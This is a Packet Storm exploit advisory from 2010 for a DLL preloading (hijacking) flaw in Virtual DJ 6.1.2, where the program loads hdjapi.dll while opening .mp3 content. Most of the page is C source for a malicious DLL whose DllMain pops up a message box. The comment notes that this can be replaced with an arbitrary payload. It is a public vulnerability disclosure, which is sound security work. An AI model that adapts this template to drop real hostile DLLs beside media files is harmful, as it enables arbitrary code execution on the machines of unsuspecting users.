Virtual DJ 6.1.2 DLL Hijacking Exploit

2010-08-30T00:00:00
ID PACKETSTORM:93298
Type packetstorm
Reporter Classity Security Scans
Modified 2010-08-30T00:00:00

Description

                                        
                                            `/*   
  
Description: Virtual DJ 6.1.2 Also vulnerable for DLL Preloading on hdjapi.dll while loading .mp3 content.  
Date: August 29, 2010   
Author: <a href="http://www.classity.nl/">Classity informatiebeveiliging</a>  
  
PoC: Displaying message box, but can be replaced by DLL with arbitrary payload.   
  
*/   
  
  
  
#include <windows.h>   
#define DllExport __declspec (dllexport)   
  
BOOL WINAPI DllMain (   
HANDLE hinstDLL,   
DWORD fdwReason,   
LPVOID lpvReserved)   
{   
dll_pl();   
return 0;   
}   
  
int dll_pl()   
{   
MessageBox(0, "Virtual DJ Vulnerable for DLL Preloading!", "DLL Message", MB_OK);   
return 0;   
}   
`